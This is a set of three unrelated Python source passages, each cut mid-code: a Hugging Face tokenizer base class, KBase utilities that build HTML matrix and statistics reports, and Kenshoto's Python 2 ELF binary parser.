encoded_inputs["token_type_ids"] = [self.pad_token_type_id] * difference + encoded_inputs[
"token_type_ids"
]
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = [1] * difference + encoded_inputs["special_tokens_mask"]
encoded_inputs["input_ids"] = [self.pad_token_id] * difference + encoded_inputs["input_ids"]
else:
raise ValueError("Invalid padding strategy:" + str(self.padding_side))
else:
if return_attention_mask:
encoded_inputs["attention_mask"] = [1] * len(encoded_inputs["input_ids"])
return encoded_inputs
def batch_decode(
self, sequences: List[List[int]], skip_special_tokens: bool = False, clean_up_tokenization_spaces: bool = True
) -> List[str]:
return [
self.decode(
seq, skip_special_tokens=skip_special_tokens, clean_up_tokenization_spaces=clean_up_tokenization_spaces
)
for seq in sequences
]
def decode(
self, token_ids: List[int], skip_special_tokens: bool = False, clean_up_tokenization_spaces: bool = True
) -> str:
raise NotImplementedError
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
assert already_has_special_tokens and token_ids_1 is None, (
"You cannot use ``already_has_special_tokens=False`` with this tokenizer. "
"Please use a slow (full python) tokenizer to activate this argument."
"Or set `return_special_token_mask=True` when calling the encoding method "
"to get the special tokens mask in any tokenizer. "
)
all_special_ids = self.all_special_ids # cache the property
special_tokens_mask = [1 if token in all_special_ids else 0 for token in token_ids_0]
return special_tokens_mask
@staticmethod
def clean_up_tokenization(out_string: str) -> str:
out_string = (
out_string.replace(" .", ".")
.replace(" ?", "?")
.replace(" !", "!")
.replace(" ,", ",")
.replace(" ' ", "'")
.replace(" n't", "n't")
.replace(" 'm", "'m")
.replace(" 's", "'s")
.replace(" 've", "'ve")
.replace(" 're", "'re")
)
return out_string
def _is_whitespace(char):
"""Checks whether `char` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `char` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `char` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if (cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
def _is_end_of_word(text):
"""Checks whether the last character in text is one of a punctuation, control or whitespace character."""
last_char = text[-1]
return bool(_is_control(last_char) | _is_punctuation(last_char) | _is_whitespace(last_char))
def _is_start_of_word(text):
"""Checks whether the first character in text is one of a punctuation, control or whitespace character."""
first_char = text[0]
return bool(_is_control(first_char) | _is_punctuation(first_char) | _is_whitespace(first_char))
class PreTrainedTokenizer(PreTrainedTokenizerBase):
def __init__(self, **kwargs):
super().__init__(**kwargs)
# Added tokens - We store this for both slow and fast tokenizers
# until the serialization of Fast tokenizers is updated
self.added_tokens_encoder: Dict[str, int] = {}
self.added_tokens_decoder: Dict[int, str] = {}
self.unique_no_split_tokens: List[str] = []
@property
def is_fast(self) -> bool:
return False
@property
def vocab_size(self) -> int:
"""
:obj:`int`: Size of the base vocabulary (without the added tokens).
"""
raise NotImplementedError
def get_vocab(self) -> Dict[str, int]:
raise NotImplementedError()
def get_added_vocab(self) -> Dict[str, int]:
return self.added_tokens_encoder
def __len__(self):
return self.vocab_size + len(self.added_tokens_encoder)
def _add_tokens(self, new_tokens, special_tokens: bool = False) -> int:
new_tokens = [str(tok) for tok in new_tokens]
tokens_to_add = []
for token in new_tokens:
assert isinstance(token, str)
if not special_tokens and self.init_kwargs.get("do_lower_case", False):
token = token.lower()
if (
token != self.unk_token
and self.convert_tokens_to_ids(token) == self.convert_tokens_to_ids(self.unk_token)
and token not in tokens_to_add
):
tokens_to_add.append(token)
if self.verbose:
logger.info("Adding %s to the vocabulary", token)
added_tok_encoder = dict((tok, len(self) + i) for i, tok in enumerate(tokens_to_add))
added_tok_decoder = {v: k for k, v in added_tok_encoder.items()}
self.added_tokens_encoder.update(added_tok_encoder)
self.added_tokens_decoder.update(added_tok_decoder)
# Make sure we don't split on any special tokens (even they were already in the vocab before e.g. for Albert)
if special_tokens:
self.unique_no_split_tokens = sorted(set(self.unique_no_split_tokens).union(set(new_tokens)))
else:
# Or on the newly added tokens
self.unique_no_split_tokens = sorted(set(self.unique_no_split_tokens).union(set(tokens_to_add)))
return len(tokens_to_add)
def num_special_tokens_to_add(self, pair: bool = False) -> int:
token_ids_0 = []
token_ids_1 = []
return len(self.build_inputs_with_special_tokens(token_ids_0, token_ids_1 if pair else None))
def tokenize(self, text: TextInput, **kwargs) -> List[str]:
def split_on_token(tok, text):
result = []
tok_extended = all_special_tokens_extended.get(tok, None)
split_text = text.split(tok)
full_word = ""
for i, sub_text in enumerate(split_text):
# AddedToken can control whitespace stripping around them.
# We use them for GPT2 and Roberta to have different behavior depending on the special token
# Cf. https://github.com/huggingface/transformers/pull/2778
# and https://github.com/huggingface/transformers/issues/3788
if isinstance(tok_extended, AddedToken):
if tok_extended.single_word:
# Try to avoid splitting on token
if (
i < len(split_text) - 1
and not _is_end_of_word(sub_text)
and not _is_start_of_word(split_text[i + 1])
):
# Don't extract the special token
full_word += sub_text + tok
elif full_word:
full_word += sub_text
result += [full_word]
full_word = ""
continue
# Strip white spaces on the right
if tok_extended.rstrip and i > 0:
# A bit counter-intuitive but we strip the left of the string
# since tok_extended.rstrip means the special token is eating all white spaces on its right
sub_text = sub_text.lstrip()
# Strip white spaces on the left
if tok_extended.lstrip and i < len(split_text) - 1:
sub_text = sub_text.rstrip() # Opposite here
else:
# We strip left and right by default
if i < len(split_text) - 1:
sub_text = sub_text.rstrip()
if i > 0:
sub_text = sub_text.lstrip()
if i == 0 and not sub_text:
result += [tok]
elif i == len(split_text) - 1:
if sub_text:
result += [sub_text]
else:
pass
else:
if sub_text:
result += [sub_text]
| |
for Simper App'
})
return html_report
def _generate_variable_stats_html_report(self, anosim_res, permanova_res, permdisp_res):
output_directory = os.path.join(self.scratch, str(uuid.uuid4()))
logging.info('Start generating html report in {}'.format(output_directory))
html_report = list()
self._mkdir_p(output_directory)
result_file_path = os.path.join(output_directory, 'variable_stats_viewer_report.html')
visualization_content = self._generate_variable_stats_visualization_content(anosim_res,
permanova_res,
permdisp_res)
table_style_content = '''
table {
font-family: arial, sans-serif;
border-collapse: collapse;
width: 66%;
}
td, th {
border: 1px solid #dddddd;
text-align: left;
padding: 8px;
}
tr:nth-child(even) {
background-color: #dddddd;
}
</style>'''
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'matrix_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
report_template = report_template.replace('</style>',
table_style_content)
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': output_directory,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for Variable Stats App'
})
return html_report
def _generate_rarefy_html_report(self, rarefied_matrix_dir,
rarecurve_image, obs_vs_rare_image, random_rare_df):
output_directory = os.path.join(self.scratch, str(uuid.uuid4()))
logging.info('Start generating html report in {}'.format(output_directory))
html_report = list()
self._mkdir_p(output_directory)
result_file_path = os.path.join(output_directory, 'rarefy_matrix_viewer_report.html')
visualization_content = self._generate_rarefy_visualization_content(
output_directory,
rarefied_matrix_dir,
rarecurve_image,
obs_vs_rare_image,
random_rare_df)
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'matrix_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': output_directory,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for Transform Matrix App'
})
return html_report
def _generate_transform_html_report(self, operations, heatmap_html_dir_l,
transformed_matrix_df, variable_specific):
output_directory = os.path.join(self.scratch, str(uuid.uuid4()))
logging.info('Start generating html report in {}'.format(output_directory))
html_report = list()
self._mkdir_p(output_directory)
result_file_path = os.path.join(output_directory, 'transform_matrix_viewer_report.html')
visualization_content = self._generate_trans_visualization_content(
output_directory,
operations,
heatmap_html_dir_l,
transformed_matrix_df,
variable_specific)
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'matrix_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': output_directory,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for Transform Matrix App'
})
return html_report
def _compute_cluster_label_order(self, values, labels):
# values = [[1, 0, 21, 50, 1], [20, 0, 60, 80, 30], [30, 60, 1, -10, 20]]
# labels = ['model_1', 'model_2', 'model_3']
if len(labels) == 1:
return labels
dist_matrix = pdist(values)
linkage_matrix = linkage(dist_matrix, 'ward')
dn = dendrogram(linkage_matrix, labels=labels, distance_sort='ascending')
ordered_label = dn['ivl']
return ordered_label
def _generate_chem_abund_heatmap_html_report(self, data, metadata_df):
logging.info('Start generating chemical abundance heatmap report page')
data_df = pd.DataFrame(data['values'], index=data['row_ids'], columns=data['col_ids'])
result_directory = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(result_directory)
group_by = ['chemical_type', 'units']
metadata_groups = metadata_df.groupby(by=group_by).groups
data_groups = dict()
for group_name, ids in metadata_groups.items():
chem_type_data = data_df.loc[ids]
idx_ordered_label = self._compute_cluster_label_order(chem_type_data.values.tolist(),
chem_type_data.index.tolist())
data_groups[group_name] = chem_type_data.reindex(index=idx_ordered_label)
output_directory = os.path.join(self.scratch, str(uuid.uuid4()))
logging.info('Start generating html report in {}'.format(output_directory))
html_report = list()
self._mkdir_p(output_directory)
result_file_path = os.path.join(output_directory, 'matrix_viewer_report.html')
visualization_content = self._generate_chem_visualization_content(output_directory,
data_groups)
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'matrix_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': output_directory,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for Import Matrix App'
})
return html_report
def _generate_heatmap_html_report(self, data):
logging.info('Start generating heatmap report page')
data_df = pd.DataFrame(data['values'], index=data['row_ids'], columns=data['col_ids'])
result_directory = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(result_directory)
tsv_file_path = os.path.join(result_directory, 'heatmap_data_{}.tsv'.format(
str(uuid.uuid4())))
data_df.to_csv(tsv_file_path)
heatmap_dir = self.report_util.build_heatmap_html({
'tsv_file_path': tsv_file_path,
'cluster_data': True})['html_dir']
top_heatmap_dir = None
top_percent = 100
if len(data_df.index) > 500:
display_count = 200 # roughly count for display items
top_percent = min(int(display_count / len(data_df.index) * 100), 100)
top_percent = max(top_percent, 1)
top_heatmap_dir = self.report_util.build_heatmap_html({
'tsv_file_path': tsv_file_path,
'sort_by_sum': True,
'top_percent': top_percent})['html_dir']
output_directory = os.path.join(self.scratch, str(uuid.uuid4()))
logging.info('Start generating html report in {}'.format(output_directory))
html_report = list()
self._mkdir_p(output_directory)
result_file_path = os.path.join(output_directory, 'matrix_viewer_report.html')
visualization_content = self._generate_visualization_content(output_directory,
heatmap_dir,
data_df,
top_heatmap_dir,
top_percent)
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'matrix_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': output_directory,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for Import Matrix App'
})
return html_report
def _generate_rarefy_report(self, new_matrix_obj_ref, workspace_id,
random_rare_df, rarecurve_image, obs_vs_rare_image,
warnings):
objects_created = [{'ref': new_matrix_obj_ref, 'description': 'Randomly Rarefied Matrix'}]
data_tsv_directory = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(data_tsv_directory)
logging.info('Start generating matrix tsv files in {}'.format(data_tsv_directory))
rarefied_matrix_tsv_path = os.path.join(data_tsv_directory,
'rarefied_matrix_{}.tsv'.format(
str(uuid.uuid4())))
random_rare_df.to_csv(rarefied_matrix_tsv_path)
rarefied_matrix_dir = self.report_util.build_heatmap_html({
'tsv_file_path': rarefied_matrix_tsv_path,
'cluster_data': True})['html_dir']
output_html_files = self._generate_rarefy_html_report(rarefied_matrix_dir,
rarecurve_image,
obs_vs_rare_image,
random_rare_df)
report_params = {'message': '',
'objects_created': objects_created,
'workspace_id': workspace_id,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 1400,
'report_object_name': 'rarefy_matrix_' + str(uuid.uuid4()),
'warnings': warnings}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def _generate_transform_report(self, new_matrix_obj_ref, workspace_id,
operations, df_results, variable_specific=False):
objects_created = [{'ref': new_matrix_obj_ref, 'description': 'Transformed Matrix'}]
data_tsv_directory = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(data_tsv_directory)
heatmap_html_dir_l = []
for i, (op, df) in enumerate(zip(operations, df_results)):
tsv_path = os.path.join(data_tsv_directory, 'op%d_%s.tsv' % (i, op))
df.to_csv(tsv_path)
heatmap_html_dir = self.report_util.build_heatmap_html({
'tsv_file_path': tsv_path,
'cluster_data': True
})['html_dir']
heatmap_html_dir_l.append(heatmap_html_dir)
output_html_files = self._generate_transform_html_report(operations, heatmap_html_dir_l,
df_results[-1],
variable_specific)
report_params = {'message': '',
'objects_created': objects_created,
'workspace_id': workspace_id,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 1400,
'report_object_name': 'transform_matrix_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def _generate_mantel_test_report(self, workspace_id, pwmantel_res):
output_html_files = self._generate_mantel_test_html_report(pwmantel_res)
report_params = {'message': '',
'workspace_id': workspace_id,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 300,
'report_object_name': 'mantel_test_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def _generate_simper_report(self, workspace_id, simper_ret, simper_sum,
species_stats, grouping_names):
output_html_files = self._generate_simper_html_report(simper_ret, simper_sum,
species_stats, grouping_names)
report_params = {'message': '',
'workspace_id': workspace_id,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 450,
'report_object_name': 'simper_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def _generate_variable_stats_report(self, workspace_id,
anosim_res, permanova_res, permdisp_res):
output_html_files = self._generate_variable_stats_html_report(anosim_res,
permanova_res,
permdisp_res)
report_params = {'message': '',
'workspace_id': workspace_id,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 450,
'report_object_name': 'variable_stats_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def _generate_report(self, matrix_obj_ref, workspace_name, new_row_attr_ref=None,
new_col_attr_ref=None, data=None, metadata_df=None):
"""
_generate_report: generate summary report
"""
objects_created = [{'ref': matrix_obj_ref, 'description': 'Imported Matrix'}]
if new_row_attr_ref:
objects_created.append({'ref': new_row_attr_ref,
'description': 'Imported Row Attribute Mapping'})
if new_col_attr_ref:
objects_created.append({'ref': new_col_attr_ref,
'description': 'Imported Column Attribute Mapping'})
if data:
if metadata_df is not None:
output_html_files = self._generate_chem_abund_heatmap_html_report(data,
metadata_df)
else:
output_html_files = self._generate_heatmap_html_report(data)
report_params = {'message': '',
'objects_created': objects_created,
'workspace_name': workspace_name,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 1400,
'report_object_name': 'import_matrix_from_excel_' + str(uuid.uuid4())}
else:
report_params = {'message': '',
'objects_created': objects_created,
'workspace_name': workspace_name,
'report_object_name': 'import_matrix_from_excel_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
@staticmethod
def _process_mapping_sheet(file_path, sheet_name):
"""
_process_mapping: process mapping sheet
"""
try:
df = pd.read_excel(file_path, sheet_name=sheet_name, dtype='str')
except XLRDError:
return dict()
else:
mapping = {value[0]: value[1] for value in df.values.tolist()}
return mapping
def _process_attribute_mapping_sheet(self, file_path, sheet_name, matrix_name, workspace_id):
"""
_process_attribute_mapping_sheet: process attribute_mapping sheet
"""
try:
df = pd.read_excel(file_path, sheet_name=sheet_name, index_col=0)
except XLRDError:
return ''
else:
obj_name = f'{matrix_name}_{sheet_name}'
result_directory = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(result_directory)
file_path = os.path.join(result_directory, '{}.xlsx'.format(obj_name))
df.to_excel(file_path)
import_attribute_mapping_params = {
'output_obj_name': obj_name,
'output_ws_id': workspace_id,
'input_file_path': file_path
}
ref = self.attr_util.file_to_attribute_mapping(import_attribute_mapping_params)
return ref.get('attribute_mapping_ref')
@staticmethod
def _file_to_df(file_path):
logging.info('start parsing file content to data frame')
try:
df = pd.read_excel(file_path, sheet_name='data', index_col=0)
except XLRDError:
try:
df = pd.read_excel(file_path, index_col=0)
logging.warning('WARNING: A sheet named "data" was not found in the attached file,'
' proceeding with the first sheet as the data sheet.')
except XLRDError:
try:
reader = pd.read_csv(file_path, sep=None, iterator=True)
inferred_sep = reader._engine.data.dialect.delimiter
df = pd.read_csv(file_path, sep=inferred_sep, index_col=0)
except Exception:
raise ValueError(
'Cannot parse file. Please provide valide tsv, excel or csv file')
# remove NaN indexed rows
df = df[df.index.notnull()]
df.index = df.index.astype('str')
df.columns = df.columns.astype('str')
# fill NA with "None" so that they are properly represented as nulls in the KBase Object
df = df.where((pd.notnull(df)), None)
return df
@staticmethod
def _check_df_col_inclusive(df, col_name, valid_values):
# check if given column contains all values in valid_values
if col_name not in df:
raise ValueError('Please provide {} column'.format(col_name))
unmatched_type = set(df[col_name]) - valid_values
if unmatched_type:
err_msg = 'Found unsupported {}: {}\n'.format(' '.join(col_name.split('_')),
unmatched_type)
err_msg += 'Please use one of {} as {}'.format(valid_values,
' '.join(col_name.split('_')))
raise ValueError(err_msg)
@staticmethod
def _check_df_col_non_empty(df, col_name):
if col_name not in df:
raise ValueError('Please provide {} column'.format(col_name))
# check if any column cell is empty(nan)
if df[col_name].isna().any():
empty_idx = list(df.loc[df[col_name].isna()].index)
raise ValueError('Missing [{}] value for index: {}'.format(col_name, empty_idx))
def _cal_identification_level(self, df, ids_df):
logging.info('Start calculating measured identification level')
identification_level = list()
high_level_keys = {'kegg', 'chebi', 'modelseed', 'inchikey', 'inchi', 'smiles'}
medium_level_keys = {'formula', 'compound_name'}
low_level_keys = {'mass'}
for idx in df.index:
db_ids = ids_df.loc[idx]
db_ids.dropna(inplace=True)
non_empty_ids_keys = set(db_ids.index)
if non_empty_ids_keys & high_level_keys:
identification_level.append('high')
| |
"""
Kenshoto's Elf parser
This package will let you use programatic ninja-fu
when trying to parse Elf binaries. The API is based
around several objects representing constructs in the
Elf binary format. The Elf object itself contains
parsed metadata and lists of things like section headers
and relocation entries. Additionally, most of the
objects implement repr() in some form or another which
allows you a bunch of readelf-like functionality.
*Eventually* this API will allow you to modify Elf binaries
and spit them back out in working order (not complete, you
may notice some of the initial code).
Send bug reports to Invisigoth or Metr0.
"""
# Copyright (C) 2007 Invisigoth - See LICENSE file for details
import os
import sys
import struct
import traceback
import zlib
from stat import *
from Elf.elf_lookup import *
verbose = False
class Elf:
"""
An Elf object representation which allows manipulation
and parsing of Elf executables. Brought to you by
kenshoto.
"""
def __init__(self, initstr):
"""
Constructacon: initstr can be a filename, or a big hunka Elf lovin
(If you only give it 52 bytes, it'll just parse the header, if you give it
more, it *will* assume it has the whole thing...
"""
self.sections = []
self.pheaders = []
self.secnames = {}
self.symbols = []
self.symbols_by_name = {}
self.symbols_by_addr = {}
self.e_ident = "NOTHINGHEREATALL"
self.e_type = 0
self.e_machine = 0
self.e_version = 0
self.e_entry = 0
self.e_phoff = 0
self.e_shoff = 0
self.e_flags = 0
self.e_ehsize = 0
self.e_phentsize = 0
self.e_phnum = 0
self.e_shentsize = 0
self.e_shnum = 0
self.e_shstrndx = 0
self.fmt = "2HI3LI6H"
self.hdrlen = struct.calcsize(self.fmt) + 16
self.myname = "unknown"
bytes = initstr
pbase = self.hdrlen
sbase = self.hdrlen
if len(initstr) > 0:
if not '\000' in initstr and os.path.exists(initstr):
bytes = file(initstr, "rb").read()
self.myname = initstr
self.initFromBytes(bytes)
# If we only got the 52 bytes, we have
# no symbols to parse etc...
if len(bytes) == self.hdrlen:
return
if self.e_shoff < self.e_phoff:
raise Exception("ERROR: we only support <elf hdr><pgrm hdrs><data><sec hdrs> format now")
# Load up any program headers we find
if self.e_phoff:
pbase = self.e_phoff
plen = self.e_phentsize
for i in range(self.e_phnum):
if self.bits == 32:
pgm = Elf32Pheader(bytes[pbase:pbase+plen],elf=self)
else:
pgm = Elf64Pheader(bytes[pbase:pbase+plen],elf=self)
self.pheaders.append(pgm)
pbase += plen
# Load up all the section headers
if self.e_shoff:
# Load up the sections
sbase = self.e_shoff
# FIXME this assumes static sized section headers
slen = self.e_shentsize
for i in range(self.e_shnum):
if self.bits == 32:
sec = Elf32Section(bytes[sbase:sbase+slen],elf=self)
else:
sec = Elf64Section(bytes[sbase:sbase+slen],elf=self)
self.sections.append(sec)
sbase += slen
# Populate the section names
strsec = self.sections[self.e_shstrndx]
names = bytes[strsec.sh_offset:strsec.sh_offset+strsec.sh_size]
for sec in self.sections:
name = names[sec.sh_name:].split("\x00")[0]
if len(name) > 0:
sec.setName(name)
self.secnames[name] = sec
self.parseSymbols()
self.parseDynamic()
self.parseRelocs()
def getName(self):
return self.myname
def __str__(self):
""" Calls toString() to obtain a string summary of this ELF. Since no additional parameters make sense, default verbosity for the module is used
"""
return self.toString(verbose)
def toString(self, verbose=False):
""" Returns a string summary of this ELF. If (verbose) the summary will include Symbols, Relocs, Dynamics and Dynamic Symbol tables"""
mystr = "ELF HEADER OBJECT:" + self.myname
mystr+= "\n= Intimate Details:"
mystr+= "\n==Magic:\t\t\t\t" + self.e_ident
mystr+= "\n==Type:\t\t\t\t\t" + e_types.get(self.e_type)
mystr+= "\n==Machine Arch:\t\t\t\t" + e_machine_types.get(self.e_machine)
mystr+= "\n==Version:\t\t\t\t%d" % (self.e_version)
mystr+= "\n==Entry:\t\t\t\t0x%.8x" % (self.e_entry)
mystr+= "\n==Program Headers(offset):\t\t%d (0x%x) bytes" % (self.e_phoff, self.e_phoff)
mystr+= "\n==Section Headers(offset):\t\t%d (0x%x) bytes" % (self.e_shoff, self.e_shoff)
mystr+= "\n==Flags:\t\t\t\t" + repr(self.e_flags) + " "
mystr+= "\n==Elf Header Size:\t\t\t" + repr(self.e_ehsize) + " (" + hex(self.e_ehsize) + " bytes)"
mystr+= "\n==Program Header Size:\t\t\t" + repr(self.e_phentsize) + " (" + hex(self.e_phentsize) + " bytes)"
mystr+= "\n==Program Header Count:\t\t\t" + repr(self.e_phnum) + " (" + hex(self.e_phnum)+ ")"
mystr+= "\n==Section Header Size:\t\t\t" + repr(self.e_shentsize) + " (" + hex(self.e_shentsize) + " bytes)"
mystr+= "\n==Section Header Count:\t\t\t" + repr(self.e_shnum) + " (" + hex(self.e_shnum) + ")"
mystr+= "\n==Section Header String Index\t\t" + repr(self.e_shstrndx) + " (" + hex(self.e_shstrndx) + " bytes)"
mystr+= "\n\n= Sections:"
for sec in self.sections:
mystr+= "\n"+repr(sec)
mystr+= "\n\n= Program Headers:"
for ph in self.pheaders:
mystr+= "\n"+repr(ph)
if (verbose):
mystr+= "\n\n= Symbols table:"
for sym in self.symbols:
mystr+= "\n"+repr(sym)
mystr+= "\n\n= Relocation table:"
for reloc in self.relocs:
mystr+= "\n"+repr(reloc)
mystr+= "\n\n= Dynamics table:"
for dyn in self.dynamics:
mystr+= "\n"+repr(dyn)
mystr+= "\n\n= Dynamic Symbols table:"
for dyn in self.dynamic_symbols:
mystr+= "\n"+repr(dyn)
return mystr
def getStrtabString(self, offset, section=".strtab"):
bytes = self.getSection(section).getBytes()
index = bytes.find("\x00", offset)
return bytes[offset:index]
def initFromBytes(self, bytes):
if len(bytes) < self.hdrlen:
raise Exception("Elf format error: Not even a full Elf header (%d bytes)", self.hdrlen)
if bytes[:4] <> "\x7fELF":
raise Exception("Elf format error: Elf magic not found")
self.e_ident = bytes[:16]
(self.e_type,
self.e_machine,
self.e_version,
self.e_entry,
self.e_phoff,
self.e_shoff,
self.e_flags,
self.e_ehsize,
self.e_phentsize,
self.e_phnum,
self.e_shentsize,
self.e_shnum,
self.e_shstrndx) = struct.unpack(self.fmt, bytes[16:self.hdrlen])
if self.e_machine in e_machine_32:
self.bits = 32
elif self.e_machine in e_machine_64:
self.bits = 64
else:
raise Exception("ERROR - Unknown 32/64 bit e_machine: %d. Add to e_machine_XX" % self.e_machine)
self.data = bytes
def buildHeader(self):
"""
Return the byte representation for *just* the elf header
for this elf.
"""
hdr = struct.pack(self.fmt,
self.e_type,
self.e_machine,
self.e_version,
self.e_entry,
self.e_phoff,
self.e_shoff,
self.e_flags,
self.e_ehsize,
self.e_phentsize,
self.e_phnum,
self.e_shentsize,
self.e_shnum,
self.e_shstrndx)
return self.e_ident + hdr
def serialize(self, filename=None):
"""
If filename is specified, serialize this elf object to the specified
file, otherwise return the bytes (read string) for this elf object
"""
# Get the Elf header
buf = self.buildHeader()
# Get the program headers
#FIXME assumes order
for pgm in self.pheaders:
buf += pgm.serialize()
phlen = self.e_phentsize * self.e_phnum
# Append the actual file data
buf += self.data[self.e_ehsize+phlen:self.e_shoff]
# Append the section headers
for sec in self.sections:
buf += sec.serialize()
if filename:
f = file(filename,'wb')
f.write(buf)
f.close()
return
return buf
def lookupSymbolName(self, name):
"""
Lookup symbol entries in this elf binary by name. The result is
a long representing the address for the given symbol. Or None if
it's not found.
"""
return self.symbols_by_name.get(name, None)
def lookupSymbolAddr(self, address):
"""
lookup symbols from this elf binary by address.
This returns the name for the given symbol or None for not found
"""
return self.symbols_by_addr.get(address, None)
def getBytes(self, offset, size, file_offset=True):
"""
Modification to the bytes this returns will NOT
be saved to the file bytes.
"""
return self.data[offset:offset+size]
def insertBytes(self, offset, bytes,section=None,file_offset=True):
"""
Insert the bytes argument at offset in the data.
The default will insert the bytes at that offset
from the beginning of the file (to ease calculations
that are based on header values). The caller may optionally
specify file_offset=False to have the offset be from
the beginning of self.data. If the inserted data falls
directly on a section boundary,
The optional "section" argument specifies which section
you would like to "own" the data (aka. which one gets his
length updated. If none, the bytes will push other data down
essentially into padding between sections...
THIS CODE DOES NOT WORK YET!
"""
ilen = len(bytes)
if section:
if ( offset < section.sh_offset or
offset > (section.sh_offset+section.sh_size)):
raise Exception("ERROR - Specified section in insertBytes has wrong offset/size: offset: %d" % offset)
section.sh_size += ilen
if file_offset:
offset -= self.getDataOffset()
self.data = self.data[:offset] + bytes + self.data[offset:]
#FIXME deal with program headers...
#for pgm in self.pheaders:
for sec in self.sections:
if offset <= (sec.sh_offset-self.getDataOffset()):
sec.sh_offset += ilen
if sec.sh_offset % sec.sh_addralign:
align = sec.sh_addralign - (sec.sh_offset % sec.sh_addralign)
off = sec.sh_offset - self.getDataOffset()
# Insert the pad bytes if this insert messes up alignment
self.data = self.data[:off] + "\x00" * align + self.data[off:]
sec.sh_offset += align
ilen += align
if offset < self.e_shoff:
self.e_shoff += ilen
print "INSERTED: ",ilen," bytes"
def getDataOffset(self):
return self.hdrlen + (self.e_phentsize * self.e_phnum)
def modifyBytes(self, offset, bytes, file_offset=True):
"""
Arguments are the same as insertBytes() except that
this method will OVERWRITE the bytes at that location
(which shouldn't cause any recalculation)
"""
blen = len(bytes)
if file_offset:
offset -= self.getDataOffset()
self.data = self.data[:offset] + bytes + self.data[offset+blen:]
def appendSection(self, section, name=None):
"""
Append the section to the Elf. The optional
name will be put into the | |
